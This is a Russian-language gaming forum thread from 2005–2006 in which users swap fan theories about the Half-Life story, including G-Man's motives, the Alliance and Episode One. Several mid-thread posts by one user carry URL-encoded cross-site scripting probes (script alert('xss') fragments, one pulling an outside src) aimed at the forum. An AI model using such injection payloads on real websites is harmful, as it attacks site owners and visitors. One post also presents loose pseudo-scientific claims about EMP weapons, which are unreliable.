Kamrad.ru
 
 
дневники | кабинет | регистрация | календарь | участники | faq | правила | поиск | фотоальбом | каська | выйти
Kamrad.ru Kamrad.ru » Тематические форумы » Action / 3D-action » Сюжет - Откуда взялся Альянс,почему мне ничего не понятно и др. ответы на вопросы тут
новая тема  ответить следующая тема | предыдущая тема
Автор
  << < 1 2 3 4 5 6 > >>
Fx.monstr - offline Fx.monstr
27-04-2005 16:54 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Dmitry(Russia)
Потом даже если на комбайнах противогаз то почему ети Lamarы на них не действуют
Комбины не люди ,поэтому мозги у них несьедобные

Karbofos - offline Karbofos
08-05-2005 16:22 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Я думаю, раз у G-Man'а есть способности к свободному перемещению в пространстве-времени, то у него была возможность проанализировать последствия различных вариантов действий, и, соответственно, выбрать наилучший. То есть в определенный момент закинуть Фримена в поезд, ничего ему не объясняя.
Далее события выстраиваются в цепочку - Барни и Аликс оказывается в нужном месте в нужное время, Брин видит Гордона и отвлекает ресурсы на охоту за ним. Одновременно активизируется подполье (судя по виду из бинокля на берегу, отчасти не без помощи G-Man'а), борьба с ним также ослабляет Цитадель. Гордон попадает в Цитадель, где его гравипушка оказывается несовместима с конфискующим полем, в результате приобретая новые качества. И все заканчивается большим фейрверком.
К вопросу о том, почему бы не отправить Гордона с тяжелым вооружением сразу в Цитадель, у меня есть несколько версий:
1. G-Man не хотел таким явным образом афишировать свое вмешательство, чтоб Покровители не заподозрили неладного. А так, не считая все-равно-непонятно-откуда-взявшегося нестареющего Гордона, все выглядит как обычный бунт среди туземцев.
2. По сюжету, прежде чем попасть в Цитадель, Гордон приобретает мотивацию к действию в виде старых друзей и Аликс. Заодно знакомится с новыми образцами вооружений, технологией и противником. Если б его инструктировал G-Man, Фримен мог бы заартачиться, да и в Цитатели его бы ожидали более крупные силы (т.к. с повстанцами до появления Гордона масштабных столкновений не происходило). А эффект внезапности не покрывает отсутствие The One Gun
3. Возможно, просто уничтожить Цитадель и Брина недостаточно. Или нужно было поднять волну сопротивления, или заставить Покровителей услышать о Фримене, в т.ч. и от Брина, или у G-Man'а есть другие далеко идущие планы. Это предвосхищая вопрос типа: "а чё не телепортнули ядрёну бомбу Брину на стол и фсё?"

Phant0m - offline Phant0m
09-05-2005 20:46 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
aka ghost



А я, бедняга, нив хл ни в хл2 не играл...

A1eX - offline A1eX
27-05-2005 11:32 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Karbofos

Хорошие мысли. Че Gman не дейвствует сам - не имеет права открыто вмешиватся. Почему? Аналогично почему Фримен, а не генетически модифицированный стосораказубый ядовитый гигантский мозгосос из параллельных миров: Gman борется не против альянса, и не против xen, он (они? "Мне поступило несколько предложений на ваш счет, мисер Фримен...") лишь следит, чтобы параллельные миры не смешивались. Чтобы в ксен не попали люди, на землю хедкрабы и тп. Он вмешивается ограничено. И имеет право в качестве "своего" бойца использовать только представителя того мира, который он защищает.

Таким образом они следят за мирами, и наиболее опасные миры - те, где изобрели телепорт. Альянс изобрел телепорт - и начал захватывать соседей, происходит постоянное смешение миров, уничтожаюся их аборигены, их миры заселяют захватчики, Gman пытается все это остановить, но так, чтобы о нем знал только Фримен, и больше никто - ни альянс, ни земля. Может поэтому Фримен молчит?

Про мотивацию клевая мысль. Свежая такая.

oblomoff - offline oblomoff
16-08-2005 20:13 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



А что значит G-man на фотографии у доктора (во второй части)?

Low paw - offline Low paw
28-08-2005 14:38 URL сообщения        Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Сомниваюсь Что Вэловцы всё так хорошо продумали скорее всего они: делают форумы для фанатов и тырят их идеи в лучшем случаи,а в худшем просто копируют какой-нибудь Дум с Г-маном.Мне страшно:выпустят третью халфу ,но будет нелогично ну не может быть три половины ну НЕ МОЖЕТ БЫТЬ!
Хотя Последних фантазий уже аж 12 штук!

Изменено: Low paw, 28-08-2005 в 14:52

Cruel_Crow - offline Cruel_Crow
04-09-2005 18:29 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад
Злой и с перьями



oblomoff Например, простой истер-эгг, коих хватает
Low paw Half-Life ещё переводится как период полураспада =)

FaustGT - offline FaustGT
16-11-2005 02:18 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Моя версия…

После прохождения ХЛ1, ХЛОФ, ХЛБШ я понял несколько вещей: пришельцы есть (т.к. Фримен попал на их землю через телепорт…а он в пространстве перемещает а не в измерениях), Джи-мэн- нелюдь(слишком нечеловеческие способности), дело происходит в России, ублюдки из первой части- невольники…Сделал выводы…
Итак, в космосе есть, как минимум, две группировки…условно “Альянс” и “Пси-мэны”(названия выбраны из способа их воздействия на низшие рассы). Они в состоянии шаткого мира(это логично нацизм есть у всех)…Основное их занятие- это развитие за счёт порабощения низших цивилизаций с целью обогащения мин. Запасов и геномом…У них есть по несколько порабощенных планет…Пси-Мэны хотят захватить(или уничтожить) Альянс…(пока про них всё)
С целью предварительной подготовки атаки высылается агент Джи-мэн(расса Пси-мэн), попасть незамеченным во владения “Альянса” невозможно(т.к. нужная планета порабощена на 70% и ужо не плохо защищена), но это и не нужно. Он отправляется на разумную ближайшую планету(Землю) и подготавливает почву для атаки…
Его цель- ослабление обороны противника за счёт дробления его сил(потом уточню).

Паллеты во сне и на яву быстрее солнца или телепорт и как он работает…

При сильном электромагнитном поле, сила которого превышает упругость ядра молекулы вещества налагаются на сверхтвёрдый экран(не помню из чего…ну минерал то этот их ХЛ1 из начала), но так как они не имеют пустот происходит аномалия- они выпадают в подпространство(в абсолютное ничто), примерно таким же способом их притягивают главное точно знать время отправки, скорость, вес, объём…правда иногда особо сильные установки могут случайно вытянуть чужой груз(ХЛ1 и ХЛ2).
Место действия……..Россия.
Почему же Россия? Просто во время железного занавеса была угроза ракетной атаки запада и русские придумали способ(это правда а не фантазия(кстати способ до сих пор работает)) сбивание любых летательных аппаратов сильным электромагнитным импульсом…Американцы заинтересовались способом и решили перенять…но столь портативную установку не смогли собрать…зато построили в Антарктиде сверхмощную под названием “Hard”(для создания плазмы в атмосфере земли(она глушит все передачи и роняет всё чё летает)(это скорее всего выдумки я услышал это в программе “военная тайна”…но испужались сорвать Землю с орбиты и законсервировали проект…В это время в России сделали аналог, но в связи с окончанием холодной войны тоже законсервировали(оч. Дорого стало)…но тайная организация тайком расконсервировала её и подмяла под себя(изменив название с Пушкин44 на Блэк Месcу)(последние доводы чистая моя фантазия)…к чему я это всё? А к тому что генераторы ЭМИ как раз и нужны для телепорта)…
Пси-Фри-Мэн…
Джи-мэн не мог действовать в открытую…могли поймать и прочитать мысли…Так он зачал ребёнка мать назвала его Гордон, а отец Фри-мэн…Мальчик рос и не подозревал что он человек тока на 50%… Он увлёкся феноменом телепортации и очень преуспел, это было у него в крови(что в свою очередь предсказал Джи-мэн)…Разумеется Гордон был первоиспытателем технологии(т.к. был лучшим специалистом)…Джи-мэн предвидел исход эксперимента и знал что Альянс не ждал вторжения землян тем более Гордона(он как ни как Пси-мэн)…знал также что Гордон покусает их сильно, что их напугает и заставит видеть землян- врагами…И они решат поработить Землю вне очереди(что их ослабит, не просто две планеты ставить на колени). Затем он отправил своего протеже десантника(не помню как его звать из ХЛОФ)…чтоб замести следы…сам он не мог…физическая сила- не его конёк…Но Фримэн удивил всех(даже папашу Джи-мэна)…да и сделал всё чистенько…у Джи-мэна не было выбора кроме как взять сынка на понт(убить как я уже говорил незаметно для врага он не мог)…он воспользовался тем что Гордон думал что он человек и не пытался сопротивляться папе(кстати забыл напомнить что он не знал кто его отец)…папа его усыпил на 2 года….
ЗЫ- понял что ублюдки из первой части невольники по кандалам(на этих ублюдках которые кидают молнии)...и нет ни фига мирного населения...одни захватчики(например эти мозгососы)...а вторглись то мы к ним...непонятка вышла вот я и подумал…
ЗЫ- не пинайте ногами я так просто мыслю в слух…тем более что у нас 7 утра…а халву я играл оч давно+)
ЗЫ- про вторую часть писать? Мож кому интересно?

FaustGT - offline FaustGT
16-11-2005 02:19 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Вот такое мне с похмела приходит в голову+))))))))

Mr.Brain - offline Mr.Brain
29-12-2005 14:00 URL сообщения        Профиль    Поиск    Контакт-лист   Редактировать
Камрад



G-man может вполне быть тем же инопланетяниным из другого измерения

kamazist1 - offline kamazist1
05-04-2006 20:16 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда http://dstopgames.nl/E%3Csсript%3Ealert('xss')%3C/sсript%3E%3Ca

kamazist1 - offline kamazist1
05-04-2006 20:17 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда "(http://dstopgames.nl/E%3Csсript%3Ealert('xss')%3C/sсript%3E%3Ca)"

kamazist1 - offline kamazist1
05-04-2006 20:19 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда http://dstopgames.nl/E%3Csсript%3Ealert




заходы сюда http://dstopgames.nl/E%3Csсript%3Ealert('xss')%3C/sсript%3E%3Ca'xss')%3C/sсript%3E%3Ca

kamazist1 - offline kamazist1
05-04-2006 20:21 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда http://dstopgames.nl/E%3Csсript%3Ealert%28'xss'%28+%3C/sсript%3E%3Ca

kamazist1 - offline kamazist1
05-04-2006 20:22 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда http://dstopgames.nl/E%3Csсript%3Ea...C/sсript%3E%3Ca

kamazist1 - offline kamazist1
05-04-2006 20:29 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



http://dstopgames.nl/E%3Csсript%3Ea==...C/sсript%3E%3Ca

kamazist1 - offline kamazist1
05-04-2006 20:34 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



заходы сюда http://dstopgames.nl/E%3Csсript%ume...0src=%22http://

kamazist1 - offline kamazist1
05-04-2006 20:35 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



хр... форум никак ссылки не принемает

kamazist1 - offline kamazist1
05-04-2006 20:43 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



yo


iuneWind - offline iuneWind
13-06-2006 09:28 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



Ну вот вышел "эпизод ван" и можно продолжать обсуждения.
Мое мнение - сама игра хорошо, хоть ипреступно коротка, но сюжет...
Это и правда невероятный маразм или мне просто показалось?
В самом начале мы снова лезем в цитадель, которую только что сами рванули, т.к. ядро НЕ ВЗОРВАЛОСЬ а стало нестабильным и теперь грозит ядерным бадабумом городу. Мы сначало немного стабилизируем ядро, чтобы успеть свалить подальше, а потом помогоаем эвакуации и наконец уезжаем из сити17...
Может было какоето другое ядро? А то уж какойто полный бред идет.

Хотя если отнсится к сюжету в шутерах так же как к сюжету в боевиках в кино... он вполне себе в меру тупой - в пределах допустимого уровня

КлаусЪ - offline КлаусЪ
20-06-2006 06:18 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



iuneWind
Не понял, что именно не нравится-то?

Targon - offline Targon
23-06-2006 18:41 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



А разве говорилось, что мы рванули ядро в конце второй части? Кажется это был или телепортатор или что-нибудь ещё!
Но в любом случае ты прав! Valve хотели делать сразу третью часть с другим сюжетом, но потом передумали и сделали "эпизодический контент", как сериал. А под это нужно было подстраивать уже сложившийся сюжет, поэтому и накосяпурили и с Гы-маном и с цитаделью!

Текущее время: 19:02 << < 1 2 3 4 5 6 > >>
новая тема  ответить следующая тема | предыдущая тема
 
Перейти:

версия для печати   отправить эту страницу по e-mail   подписаться на эту тему

 
Powered by: vBulletin Version 2.0.1
Copyright ©2000, 2001, Jelsoft Enterprises Limited.
Любое использование материалов сайта
возможно только с разрешения его администрации.


 

Рейтинг@Mail.ru
Рейтинг@Mail.ru